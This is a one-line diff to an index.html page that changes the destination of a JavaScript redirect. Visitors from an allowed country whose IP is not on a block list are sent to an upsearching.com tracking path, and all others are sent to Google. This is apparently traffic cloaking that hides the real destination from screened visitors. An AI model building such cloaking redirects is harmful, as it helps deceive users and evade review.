--- a/index.html
+++ b/index.html
@@ -45,7 +45,7 @@ const blockedIPs = [
         });
 
         if (country === allowedCountry && !isBlocked) {
-          window.location.href = "https://www.upsearching.com/DZRZX6W/2F947FC3/";
+          window.location.href = "https://www.upsearching.com/DZRZX6W/2CD98KJG/";
         } else {
           window.location.href = "https://www.google.com/";
         }
